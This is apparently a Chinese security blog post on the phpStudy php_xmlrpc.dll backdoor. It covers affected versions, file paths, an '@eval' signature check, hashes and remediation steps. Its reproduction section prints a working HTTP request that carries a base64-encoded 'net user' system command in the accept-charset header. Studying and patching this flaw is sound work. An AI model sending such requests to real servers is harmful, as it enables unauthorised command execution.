phpStudy后门RCE,复现/批量脚本/修复
phpStudy后门介绍
phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,并通过验证复现。- 软件作者声明:phpstudy 2016版PHP5.4存在后门。
- 实际测试官网下载phpstudy2018版php-5.2.17和php-5.4.45也同样存在后门
后门检测方法
手动检查
后门代码存在于\ext\php_xmlrpc.dll
模块中,phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45
phpStudy2016路径
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路径
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
用记事本打开此文件查找@eval
,文件存在@eval(%s(‘%s’))
证明漏洞存在
MD5: 0F7AD38E7A9857523DFBCE4BCE43A9E9
MD5: C339482FD2B233FB0A555B629C0EA5D5
工具检查并修复
官方发布了:phpstudy 安全自检修复程序,可用于2016 2018版本的安全检测与修复,下载该文件一键检查与修复。phpStudy后门RCE与复现
GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1
其中要注意的是accept-charset
,里边是要执行的命令base64
加密。
应对措施
- 对服务器进项全盘查杀,检查web程序是否存在后门和Webshell,检查操作系统是否有隐藏的账号以及后门。
- 使用phpStudy官方发布的自检修复程序进行检查与修复,地址在上面。
- 在官网下载全新的phpStudy程序,新版没有后门。
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 落子西部 4994573
- 2 网友拍到青岛海市蜃楼 4976161
- 3 张颂文回应砍价被吐槽穷酸 4828425
- 4 各地经济发展方案“定制化” 4796800
- 5 博世:问界M7事故车未搭载博世智驾 4614963
- 6 宋雨琦 反正他们听不懂 4577732
- 7 古天乐坚持十年每天只吃一顿饭 4420291
- 8 9.9的风终于还是卷到了星巴克 4339964
- 9 黑色餐具不能用?上海官方辟谣 4214016
- 10 3人卖假玲娜贝儿玩具超2000万获刑 4147719